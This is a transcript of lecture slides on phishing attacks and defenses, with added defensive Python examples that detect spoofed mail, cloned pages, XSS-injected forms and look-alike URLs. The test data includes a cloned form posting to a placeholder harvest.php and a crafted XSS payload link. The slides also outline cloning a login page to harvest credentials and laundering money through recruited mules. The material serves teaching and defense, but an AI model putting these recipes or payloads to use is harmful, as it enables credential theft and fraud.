Phishing Attacks
Transcript of Phishing Attacks
Phishing Attacks
Dr. Neminath Hubballi
Outline
Motivation
Introduction
Forms and means of phishing attacks
Phishing today
Staying safe
Server side defense
Personal level defense
Enterprise level defense
Distributed phishing
Indian Institute of Technology Indore
Motivation: Phishing Attacks in India and Globally
India lost around $53 million (about Rs 328 crore) to phishing scams, with the country facing over 3,750 attacks in July-September last year
India is the 4th largest target of phishing attacks in the world: 7% of global phishing attacks target India; the US tops the ranking with 27% of phishing attacks
RSA identified 46,119 phishing attacks globally in September, a 36 per cent increase compared with August (33,861)
Courtesy: The Hindu Business Line, http://www.thehindubusinessline.com/industry-and-economy/info-tech/india-lost-53-m-to-phishing-attacks-in-q3/article5414170.ece
Phishing Attacks
The word is made up of
Phreaking + Fishing = Phishing
Phreaking = making phone calls for free, back in the 70's
Fishing = attract the fish to bite
There are lots of fish in the pond
Lure them to come and bite
Those who bite become victims
Courtesy: Google Images
Phishing Attacks
Phishing is a form of social engineering attack
Not all social engineering attacks are phishing attacks!
Mimic the communication and appearance of legitimate communications and companies
The first phishing incident appeared in 1995
Attractive targets include
Financial institutions
Gaming industry
Social media
Security companies
Phishing Information Flow
Three components
Mail sender: sends large volumes of fraudulent emails
Collector: collects sensitive information from users
Casher: uses the collected sensitive information to encash
Courtesy: Junxiao Shi and Sara Saleem
Phishing Forms
Creating fake URLs and sending them
Misspelled URLs
www.sbibank.statebank.com
www.micosoft.com
www.mircosoft.com
Creating misleading anchor text
<a href="attacker's URL">Link Text</a>: the user reads the Link Text, the browser follows the href
Fake SSL lock
Simply show it so that users feel secure
Getting valid certificates for illegal sites
Certifying authority not being alert
Sometimes users overlook security certificate warnings
URL manipulation using JavaScript
Phishing Payload
Phishing Purpose
Types of Phishing
Clone Phishing:
Phisher creates a clone email
Done by getting the contents and the addresses of the recipients and the sender of a genuine email
Spear Phishing:
Targeting a specific group of users
All users of that group have something in common
Ex: targeting all faculty members of IITI
Phone Phishing:
Call up someone and say you are from the bank
Ask for the password, saying you need to do maintenance
Use of VoIP makes this easy and cheap
Email Spoofing for Phishing
An email concealing its true source
Ex: [email protected] when it is actually coming from somewhere else
Send an email saying your bank account needs to be verified urgently
When the user believes it
Sends her credit card details
Gives her password
Sending spoofed email is very easy
There are many spoof mail generators
Sample Email
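The spoofing described on the previous slide only controls the headers the sender types (From:, Reply-To:). The receiving mail server adds headers of its own (Return-Path:, Authentication-Results:) that the phisher cannot forge, and a mismatch between the two sets is the cheapest spoof check there is. The following is an added example, not code from the lecture; both messages are constructed, and the domains (sbi.example, mailer-rental.example, iiti.example) and the IP 203.0.113.7 are placeholders.

```python
"""Flag an email whose visible From: does not line up with the path it actually
travelled. Added example, not from the lecture; both messages below are
constructed, and all domains/IPs are placeholders."""
from email import message_from_string
from email.utils import parseaddr


def _domain(header_value):
    """Lower-cased domain of an address like 'Name <user@host>' ('' if absent)."""
    _, address = parseaddr(header_value or "")
    return address.rpartition("@")[2].lower()


def check_sender(raw_message):
    """Return the list of reasons the message looks spoofed (empty = aligned).

    Three cheap checks a receiving MTA or a mail client can make:
      * From: domain vs Return-Path: (envelope sender) domain
      * From: domain vs Reply-To: domain, where a Reply-To is present
      * SPF and DKIM results recorded by our own MTA in Authentication-Results:
    Only headers added by our own MTA (Return-Path, Authentication-Results) are
    trustworthy; From: and Reply-To: are whatever the sender typed.
    """
    msg = message_from_string(raw_message)
    reasons = []
    from_dom = _domain(msg["From"])
    ret_dom = _domain(msg["Return-Path"])
    if ret_dom and ret_dom != from_dom:
        reasons.append(f"Return-Path domain {ret_dom} != From domain {from_dom}")
    reply_dom = _domain(msg["Reply-To"])
    if reply_dom and reply_dom != from_dom:
        reasons.append(f"Reply-To domain {reply_dom} != From domain {from_dom}")
    # Collapse header folding so substring checks work on one line.
    auth = " ".join((msg["Authentication-Results"] or "").lower().split())
    for mech in ("spf", "dkim"):
        if f"{mech}=pass" not in auth:
            reasons.append(f"{mech} did not pass: {auth or 'no Authentication-Results header'}")
    return reasons


# Constructed phishing mail: bank brand in From:, bounce path and reply address elsewhere.
SPOOFED = """\
Return-Path: <bounce@mailer-rental.example>
Received: from mailer-rental.example (203.0.113.7) by mx.iiti.example
Authentication-Results: mx.iiti.example; spf=fail smtp.mailfrom=mailer-rental.example; dkim=none
From: "SBI Alerts" <alerts@sbi.example>
Reply-To: <verify@sbi-secure-login.example>
To: victim@iiti.example
Subject: Your account will be suspended

Click on the link below to verify your account.
"""

# Constructed genuine mail: every path agrees and both authentication results pass.
LEGIT = """\
Return-Path: <alerts@sbi.example>
Authentication-Results: mx.iiti.example; spf=pass smtp.mailfrom=sbi.example; dkim=pass header.d=sbi.example
From: "SBI Alerts" <alerts@sbi.example>
To: victim@iiti.example
Subject: Your March statement

Dear Dr. Neminath, your statement is attached.
"""

if __name__ == "__main__":
    print("spoofed:", check_sender(SPOOFED))
    print("legit:", check_sender(LEGIT))
```

Two caveats: a message with no Authentication-Results header fails closed here, which is the right default for an inbound gateway but will flag mail from systems that do not record SPF/DKIM results; and the Return-Path comparison is only meaningful when the header was written by your own server, since an upstream relay (or the phisher) can include a fake one.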
Web Spoofing for Phishing
Setting up a webpage which looks similar to the original one
Save any webpage as an HTML page
Go to view source and save
A PHP script which stores the credentials to a file is all that is required to harvest them
In the HTML page search for the login form and change its action to the PHP script
Host it on a server
You are ready to go!
Send a spoofed email with a link to the spoofed webpage
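The recipe above leaves two marks that a scanner can look for in a suspected clone page or an HTML email: the login form now posts somewhere other than the bank's genuine host, and anchors whose visible text names the bank point their href elsewhere (the anchor text trick from the Phishing Forms slide). The following is an added example, not code from the lecture; the cloned page and every host in it (onlinesbi.example, sbi-secure-login.example, 203.0.113.7) are constructed.

```python
"""Check an HTML email or a suspected clone page for two tell-tales of the web
spoofing described above: anchors whose visible text names one host while the
href points at another, and forms that post credentials anywhere other than the
brand's genuine host. Added example, not the lecture's code; the page below and
all hosts in it are constructed."""
import re
from html.parser import HTMLParser
from urllib.parse import urljoin, urlparse

# Visible anchor text that itself reads like a URL or host name.
LOOKS_LIKE_URL = re.compile(r"^(https?://)?[\w.-]+\.[a-z]{2,}(/\S*)?$", re.I)


def _host(value):
    """Lower-cased hostname of a URL or bare host, without a leading 'www.'."""
    value = value.strip()
    if "://" not in value:
        value = "http://" + value
    h = (urlparse(value).hostname or "").lower()
    return h[4:] if h.startswith("www.") else h


class SpoofScanner(HTMLParser):
    def __init__(self, page_url, legit_host):
        super().__init__()
        self.page_url = page_url             # where the HTML was actually fetched from
        self.legit_host = _host(legit_host)  # the host the page claims to belong to
        self.findings = []
        self._href = None                    # href of the <a> currently open
        self._text = []                      # visible text collected inside it

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "a" and a.get("href"):
            self._href, self._text = a["href"], []
        elif tag == "form":
            # A missing or relative action posts back to the serving host, so resolve against page_url.
            target = _host(urljoin(self.page_url, a.get("action") or ""))
            if target != self.legit_host:
                self.findings.append(("form posts off-site", target))

    def handle_data(self, data):
        if self._href is not None:
            self._text.append(data)

    def handle_endtag(self, tag):
        if tag == "a" and self._href is not None:
            shown = "".join(self._text).strip()
            real = _host(urljoin(self.page_url, self._href))
            # Only text that itself reads as a URL/host can mislead about the destination.
            if LOOKS_LIKE_URL.match(shown) and _host(shown) != real:
                self.findings.append(("anchor text hides real target", f"{_host(shown)} -> {real}"))
            self._href = None


def scan_html(html, page_url, legit_host):
    """Return a list of (what, detail) findings; empty means nothing suspicious."""
    s = SpoofScanner(page_url, legit_host)
    s.feed(html)
    s.close()
    return s.findings


# Constructed clone of a bank login page, as it would be served from an attacker's host.
CLONED_PAGE = """<html><body>
<h1>Login to OnlineSBI</h1>
<form method="post" action="http://203.0.113.7/harvest.php">
  <input name="username"><input name="password" type="password">
  <input type="submit" value="Login">
</form>
<p>Trouble logging in? <a href="http://sbi-secure-login.example/help">https://www.onlinesbi.example/help</a></p>
<p><a href="https://www.onlinesbi.example/terms">Terms of use</a></p>
</body></html>"""

if __name__ == "__main__":
    for finding in scan_html(CLONED_PAGE, "http://203.0.113.7/sbi/index.html", "www.onlinesbi.example"):
        print(*finding)
```

The page URL matters: a clone usually keeps the saved form's relative action, which then posts to the attacker's own host, so the scanner must resolve actions against the URL the HTML was fetched from rather than the host the page pretends to be.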
Phishing Today
Use bots to perform large-scale activity
Relays for sending spam and phishing emails
Phishing Kits
Ready to use
Contain clones of many banks and other websites
Emails
JPEG images: the complete email is an image, so there is no text for a filter to scan
Suspicious parts of the URL may have the same color as the background
Use font differences
The substitution of uppercase "I" for lowercase "l", and the number zero for uppercase "O"
Use of the first 4 digits of the credit card number, which are not unique to the customer (they identify the card issuer, so the phisher can quote them for any customer of that bank)
Phishing Today
Uncommon encoding mechanisms
Cross site scripting
Sites that accept user input and lack a sanity check are vulnerable; the phishing content is then served from the legitimate site
Fake banner advertisements
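Why cross site scripting matters for phishing: the link in the email points at the genuine site, so a host-based check passes, yet the page the victim sees contains the attacker's login form. The following is an added example, not code from the lecture, showing the unsanitized echo the slide refers to next to the escaped version; the site (onlinesbi.example), the search parameter and the payload are constructed.

```python
"""Reflected cross-site scripting as a phishing carrier: the legitimate site echoes
a query parameter without a sanity check, so a link to the *real* site can inject
a fake login form. Added example, not the lecture's code; site, parameter and
payload are constructed."""
from html import escape
from urllib.parse import urlparse, parse_qs

TEMPLATE = "<h1>Search results for: {q}</h1>"


def render_vulnerable(query):
    """No sanity check: whatever the link carried lands in the page as markup."""
    return TEMPLATE.format(q=query)


def render_hardened(query):
    """Escape before interpolating so <, >, & and quotes become inert text."""
    return TEMPLATE.format(q=escape(query, quote=True))


def link_host(url):
    """The host a naive filter would judge the link by."""
    return urlparse(url).hostname


def query_from_link(url):
    """The ?q= value a victim's browser sends when following the link."""
    return parse_qs(urlparse(url).query).get("q", [""])[0]


def contains_form(rendered):
    """True if a <form> tag survived into the page as real markup."""
    return "<form" in rendered


# Constructed phishing link: the host is the genuine site, the payload is in the query.
PHISH_LINK = ("https://www.onlinesbi.example/search?q="
              "%3Cform+action%3D%22http%3A%2F%2F203.0.113.7%2Fharvest.php%22%3E"
              "Session+expired%2C+log+in+again%3A+%3Cinput+name%3Dpassword%3E%3C%2Fform%3E")

if __name__ == "__main__":
    q = query_from_link(PHISH_LINK)
    print("host in link:", link_host(PHISH_LINK))   # looks perfectly legitimate
    print("vulnerable  :", render_vulnerable(q))
    print("hardened    :", render_hardened(q))
```

The hardened version is the whole fix for this class: escape at the point where untrusted text is inserted into HTML, not somewhere earlier in the request pipeline where the output context is not yet known.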
Phishing Today
Dynamic code
Phishing emails contain links to sites whose contents change
When the email came in at midnight the page was harmless, but the next day when you clicked it had turned malicious, so a scan at delivery time sees nothing
Numbers (IP addresses) in URLs
Use of targeted email
Gather enough information about the user from social networking sites
Send a targeted email using the knowledge from the previous step
Unsuspecting user clicks on the link
Attacker takes control of the recipient's machine (backdoor, trojan)
Steal / harvest credentials
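The URL tricks spread over these slides (misspelled domains on the Phishing Forms slide, the I/l and 0/O substitutions, uncommon encodings, brand names used as subdomains, raw IP addresses) can all be caught by one URL analyzer. The following is an added example, not code from the lecture; the brand allowlist is a constructed stand-in for a real one, and all test URLs are made up. It generalizes the slide's examples by folding homoglyphs before measuring edit distance, so a pure character swap and a misspelling are scored by the same rule.

```python
"""Score a URL for the obfuscation tricks these slides list: a raw IP address as host,
percent-encoding in the host, a brand name tucked into a subdomain or the user@
part, and look-alike spellings of a known brand (misspellings plus the I/l and 0/O
swaps). Added example, not the lecture's code; the brand list is a constructed
allowlist for the demonstration and all test URLs are made up."""
import ipaddress
from urllib.parse import unquote, urlparse

# registrable domain -> the short brand name users recognise (constructed allowlist)
KNOWN_BRANDS = {"microsoft.com": "microsoft", "onlinesbi.com": "sbi"}

# What the eye reads when a phisher swaps these characters. The host is lower-cased
# first, so an uppercase I has already become i before this table is applied.
HOMOGLYPHS = str.maketrans({"0": "o", "1": "l", "i": "l"})


def edit_distance(a, b):
    """Levenshtein distance, O(len(a)*len(b))."""
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1, cur[j - 1] + 1, prev[j - 1] + (ca != cb)))
        prev = cur
    return prev[-1]


def registrable(host):
    """Last two labels; adequate for .com-style names (no public-suffix list here)."""
    return ".".join(host.split(".")[-2:])


def analyze_url(url):
    """Return a list of findings; an empty list means nothing suspicious was seen."""
    findings = []
    p = urlparse(url)
    host = (p.hostname or "").lower()
    if p.username:
        # http://www.microsoft.com@203.0.113.7/ : the text before '@' is userinfo, not the host
        findings.append(f"userinfo '{p.username}' before '@' hides the real host {host}")
    if "%" in p.netloc:
        findings.append("percent-encoded host")
        host = unquote(host)
    try:
        ipaddress.ip_address(host)
        findings.append(f"raw IP address as host: {host}")
        return findings
    except ValueError:
        pass
    reg = registrable(host)
    if reg in KNOWN_BRANDS:
        return findings                      # genuine registrable domain
    # Brand name as a subdomain label of an unrelated domain: www.sbibank.statebank.com
    for name in KNOWN_BRANDS.values():
        if any(name in label for label in host.split(".")[:-2]):
            findings.append(f"brand '{name}' appears as a subdomain of unrelated domain {reg}")
    # Look-alike registrable domain: small edit distance once homoglyphs are folded
    folded = reg.translate(HOMOGLYPHS)
    for brand in KNOWN_BRANDS:
        d = edit_distance(folded, brand.translate(HOMOGLYPHS))
        if d <= 2:
            findings.append(f"look-alike of {brand} (edit distance {d} after homoglyph folding)")
    return findings


if __name__ == "__main__":
    for u in ("https://www.microsoft.com/", "http://www.micosoft.com/", "http://www.mircosoft.com/",
              "http://MICR0SOFT.com/", "http://www.sbibank.statebank.com/login",
              "http://www.microsoft.com@203.0.113.7/", "http://www.micr%6fsoft.com/"):
        print(u, "->", analyze_url(u) or "ok")
```

The two-label registrable() is the weak spot: for country-code domains such as .co.in you need a public suffix list, otherwise every .co.in site collapses to "co.in". Percent-encoding in the host is reported even when the decoded host is genuine, because no legitimate sender has a reason to write a host that way.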
Enterprise Level Protection
Collecting data from users
About emails received
Website links
Why should anyone give you such data?
Because it is in her own interest too
Incentives
Analyzing spam emails for keywords
"click on the link below"
"enter user name and password here"
"account will be deleted" etc.
Personalization of emails
Every email should quote some secret that proves the sender's identity
Ex: phrase it as "Dear Dr. Neminath" instead of "Dear Customer"
Referring to the timing of a previous email
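The keyword analysis and the personalization check from this slide fit in one body scorer: weighted phrase patterns for the urgency and credential-asking language, plus a check of how the mail greets the reader, since a bulk phish cannot know the customer's name. The following is an added example, not code from the lecture; the patterns, weights, threshold and sample mails are constructed.

```python
"""Score the body of an email the way the 'analyzing spam emails for keywords'
bullet suggests, and apply the personalization cue from the next bullet: a
genuine bank mail greets the customer by name, a bulk phish says 'Dear Customer'.
Added example, not the lecture's code; phrases, weights and sample mails are
constructed."""
import re

# (pattern, weight): the slide's phrases plus common variants, matched on lower-cased text
PHISH_PATTERNS = [
    (r"click (on )?the link below", 2),
    (r"enter (your )?user ?name (and|/) ?password", 3),
    (r"account will be (deleted|suspended|closed|blocked)", 3),
    (r"verify your (account|identity|details)", 2),
    (r"within (24|48) hours|immediately|urgent", 1),
]
GENERIC_GREETING = re.compile(r"^\s*dear\s+(customer|user|member|client|account holder)\b", re.I | re.M)
QUARANTINE_THRESHOLD = 4   # constructed: tune against your own mail flow


def score_body(body, customer_name=None):
    """Return (score, hits) for one message body.

    customer_name is the name the bank would have used in a genuine mail; when it
    is known and absent from the body, that counts as a weak signal.
    """
    text = body.lower()
    hits, score = [], 0
    for pattern, weight in PHISH_PATTERNS:
        if re.search(pattern, text):
            hits.append(pattern)
            score += weight
    if GENERIC_GREETING.search(body):
        hits.append("generic greeting")
        score += 2
    elif customer_name and customer_name.lower() not in text:
        hits.append("customer name absent")
        score += 1
    return score, hits


def should_quarantine(body, customer_name=None):
    return score_body(body, customer_name)[0] >= QUARANTINE_THRESHOLD


# Constructed samples
PHISH = """Dear Customer,

Your account will be suspended within 24 hours. Click on the link below and
enter your username and password to verify your account.
"""
LEGIT = """Dear Dr. Neminath,

As mentioned in our email of 3 March, your new debit card has been dispatched.
No action is needed on your part.
"""

if __name__ == "__main__":
    for name, body in (("phish", PHISH), ("legit", LEGIT)):
        print(name, score_body(body, "Neminath"), "quarantine" if should_quarantine(body, "Neminath") else "deliver")
```

Keyword scoring alone is easy to evade (the image-only emails from the Phishing Today slide carry no text at all), so in practice this score is one feature next to the sender-alignment and URL checks, not a verdict on its own.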
What Banks are Doing to Protect from Phishing
Banks and their customers lose crores of rupees every year
They hire professional security agencies who constantly monitor the web for phishing sites
Regularly alert the users "to be alert" and not to fall prey
Use the best state-of-the-art security software and hardware
Whitelists of legitimate sites and blacklists of phishing sites
Personal Level Protection
Email Protection
Blocking dangerous email attachments
Disable HTML capability in all emails
Awareness and education
Web browser toolbars
Connect to a database of FQDN to IP address mappings of phishing sites
I think Google Chrome does it automatically
Multifactor authentication
Gmail has it now
Case Study 1: Phone Phishing Experiment
50 employees were contacted by female crooks
Had friendly conversations
Managed to get e-banking passwords
Do not believe the statistics but believe the takeaway!
Source: Experimental Case Studies for Investigating E-Banking Phishing Intelligent Techniques and Attack Strategies
Money Laundering
Phishing allows you to make money
Many banks do not allow money transfers to foreign banks just like that
But how to stay undetected?
Launder the money
How to launder money
Offer jobs to needy people
Ask them to open accounts in the same bank
Put money into their accounts
Ask them to take a small commission and transfer the rest to their account in Nigeria
Distributed Phishing Attack
Till now we understood there is one collection center for data
What if the attacker raises multiple such sites and collects data from each?
An extreme example: every user is redirected to a different site, so taking down one site stops only one victim's leak
An attacker can look for cheaper options for collecting such data
Use malware to erect more such sites hidden in someone else's webpage
Users with reliable connectivity who have popular software like games installed are the targets for hosting them